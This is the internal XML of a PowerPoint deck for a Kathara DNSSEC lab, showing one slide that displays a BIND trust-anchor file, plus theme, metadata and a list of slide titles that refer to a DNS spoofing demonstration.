          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1018146E-F54E-4653-8C3C-2402B9CF9A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34235345-A996-7D19-F1C3-BFE796DE3C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897E6250-D913-4037-F2EE-F2C8AF23F202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2748056"/>
            <a:ext cx="10972799" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B72B384-6A8B-C0B4-3499-7DBC9FEDD9C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="2572065"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>trust-anchors { "." static-key 257 3 13 "wu8ma9EvxFhISJabP7+JOBwn/geejdepyV4WVi5Uv0Tn80KNQfpAuDeNhKEunT5pmUXjIx/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rkdOiK</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xApdQNEg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=="; };</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{028E44F8-7B45-6936-DF02-E1D8804A38F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C424553-3C54-0CB3-A99C-5C90AF00EFA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E380453-112D-D145-202A-AECFF3D174F7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64CD22CB-937C-01A4-CE03-8E68684DFAFE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7622DA6C-4446-1148-4DAE-5DE6DDD86017}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4026767327"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="slides-template">
  <a:themeElements>
    <a:clrScheme name="slides-template 14">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="FF0000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="808080"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="483FFF"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FCEA04"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B1AFFF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="E4D403"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="009999"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="99CC00"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="slides-template">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slides-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slides-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slides-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slides-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slides-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slides-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slides-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slides-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slides-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slides-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slides-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slides-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slides-template 13">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="FF0000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="808080"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="99C4DF"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="FCEA04"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="CADEEC"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="E4D403"/>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slides-template 14">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="FF0000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="808080"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="483FFF"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="FCEA04"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="B1AFFF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="E4D403"/>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Presentation2" id="{CEF9E157-3A07-1948-A978-1A0E0EF844D0}" vid="{6931B5DE-37A9-0140-8222-582175C387CF}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Tema di 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i Offic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9F8297A7-B94C-483D-AD38-856490F0F154}">
  <we:reference id="WA200005566" version="3.0.0.3" store="Omex" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="WA200005566" version="3.0.0.3" store="WA200005566"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o" ma:contentTypeID="0x0101007EB2CA632F902743835D1E561AFB238F" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="3212e702edaf026d34f3f463c2b197f1">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="81e8b71c-ed62-4b5a-8a6a-dfc35b998427" xmlns:ns4="37c45f14-d49a-44b2-a48a-3f25cba2ab6d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="c7890791843b95e4852a59e66f9e0c3a" ns3:_="" ns4:_="">
    <xsd:import namespace="81e8b71c-ed62-4b5a-8a6a-dfc35b998427"/>
    <xsd:import namespace="37c45f14-d49a-44b2-a48a-3f25cba2ab6d"/>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Tags" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceOCR" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceDateTaken" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceGenerationTime" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceEventHashCode" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceLocation" minOccurs="0"/>
                <xsd:element ref="ns4:MediaLengthInSeconds" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceAutoKeyPoints" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceKeyPoints" minOccurs="0"/>
                <xsd:element ref="ns4:_activity" minOccurs="0"/>
                <xsd:element ref="ns4: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1e8b71c-ed62-4b5a-8a6a-dfc35b998427" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="SharedWithUsers" ma:index="8" nillable="true" ma:displayName="Condiviso con"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Condiviso con dettagli" ma:description="" ma:internalName="SharedWithDetails" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="SharingHintHash" ma:index="10" nillable="true" ma:displayName="Hash suggerimento condivisione" ma:description=""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7c45f14-d49a-44b2-a48a-3f25cba2ab6d"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Location" ma:index="18" nillable="true" ma:displayName="Location" ma:internalName="MediaServiceLocation" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaLengthInSeconds" ma:index="19" nillable="true" ma:displayName="Length (seconds)" ma:internalName="MediaLengthInSeconds" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Unknown"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceAutoKeyPoints" ma:index="20" nillable="true" ma:displayName="MediaServiceAutoKeyPoints" ma:hidden="true" ma:internalName="MediaServiceAutoKeyPoints" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceKeyPoints" ma:index="21" nillable="true" ma:displayName="KeyPoints" ma:internalName="MediaServiceKeyPoints" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="_activity" ma:index="22" nillable="true" ma:displayName="_activity" ma:hidden="true" ma:internalName="_activity">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceObjectDetectorVersions" ma:index="23" nillable="true" ma:displayName="MediaServiceObjectDetectorVersions" ma:description=""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i contenuto"/>
        <xsd:element ref="dc:title" minOccurs="0" maxOccurs="1" ma:index="4" ma:displayName="Tito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37c45f14-d49a-44b2-a48a-3f25cba2ab6d" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D71EC864-2156-4B21-A067-1D25A4DE593D}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="37c45f14-d49a-44b2-a48a-3f25cba2ab6d"/>
    <ds:schemaRef ds:uri="81e8b71c-ed62-4b5a-8a6a-dfc35b998427"/>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7F04DE2C-E681-4AC7-A274-897442D1E104}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D33CB6BD-420D-45A7-A697-6C9DAB4721DA}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="37c45f14-d49a-44b2-a48a-3f25cba2ab6d"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="81e8b71c-ed62-4b5a-8a6a-dfc35b998427"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Kathara Template new Logo</Template>
  <TotalTime>1751</TotalTime>
  <Words>9338</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1464</Paragraphs>
  <Slides>101</Slides>
  <Notes>7</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Caratteri utilizzati</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Tema</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Titoli diapositive</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>101</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="110" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>slides-template</vt:lpstr>
      <vt:lpstr>kathara lab</vt:lpstr>
      <vt:lpstr>copyright notice</vt:lpstr>
      <vt:lpstr>lab configuration without dnssec</vt:lpstr>
      <vt:lpstr>content of the lab without dnssec and redundancy</vt:lpstr>
      <vt:lpstr>network topology</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>start the lab</vt:lpstr>
      <vt:lpstr>attack simulation without dnssec</vt:lpstr>
      <vt:lpstr>iptables command</vt:lpstr>
      <vt:lpstr>run Python script</vt:lpstr>
      <vt:lpstr>sniff the traffic</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>lab configuration with dnssec and without redundancy</vt:lpstr>
      <vt:lpstr>network topology</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
